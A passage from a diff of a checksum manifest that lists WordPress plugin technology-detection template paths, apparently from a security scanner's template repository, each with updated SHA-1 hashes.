-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6519,7 +6519,7 